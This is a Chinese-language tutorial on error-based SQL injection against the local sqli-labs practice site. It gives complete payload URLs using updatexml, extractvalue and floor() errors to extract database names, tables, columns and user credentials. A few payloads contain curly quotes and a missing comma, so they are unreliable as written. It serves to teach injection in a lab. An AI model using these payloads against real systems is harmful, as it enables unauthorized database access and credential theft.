SQL注入之报错注入流程以及实践操作

报错注入流程：

​ 1.判断是否存在注入点
​ 2.构造错误的语法制造报错
​ 3.使用报错函数：updatexml,extractvalue,floor(),exp()等。

sql报错注入：extractvalue、updatexml报错原理：
转载于：https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html?spm=a2c4e.10696291.0.0.4a3c19a4xQumaw

十种报错注入的方法：
转载于：https://www.cnblogs.com/wocalieshenmegui/p/5917967.html

updatexml:update可更新的，xml可扩展标记语言；

描述：返回替换的XML片段
具有查询功能的函数，用于查询
payload:
updatexml: (xml_document,Xpathstring,new_value)
爆数据库名：

updatexml

0x3a是为了在xpath中是语法错误的
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x3a,database(),0x3a),1) --+
爆表名：
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),0x7e),1) --+
爆字段名：
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),0x7e),1) --+
爆数据：
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users),0x7e),1) --+

extractvalue：

描述：使用xpath表示法从XML字符串中提取值
xml_docment:xml标记
Xpthstring: 显示输入语句
new_value:新值

爆数据库名：
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat(database())))
爆表名：
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(table_name) from information_schema.tables where table_schema=‘security’))))
爆字段名：
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’))))
爆数据：
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users)))

floor()报错注入:

https://www.cnblogs.com/litlife/p/8472323.html floor的讲解！

准确地说应该是floor,count,group by冲突报错

爆数据库名：
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from(select count(*),concat(database(),0x7e,floor(rand(0)*2))x from information_schema.tables group by x) a)

爆表名：
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat(’~’,(select table_name from information_schema.tables where table_schema=‘security’ limit 3,1),’~’,floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+

爆字段名：
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat(’~’,(select column_name from information_schema.columns where table_schema=‘security’ limit 5,1),’~’,floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+

爆数据：
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*) ,concat(’~’(select concat(username,";",password,";")from security.users limit 5,1),floor(rand(0)*2))x from security.users group by x)a)

如果显示不完整：

substring(database(),5,10)

*Substring是字符截取函数，*

*String是字符串*

*从string里面第五个字符开始截取十个字符*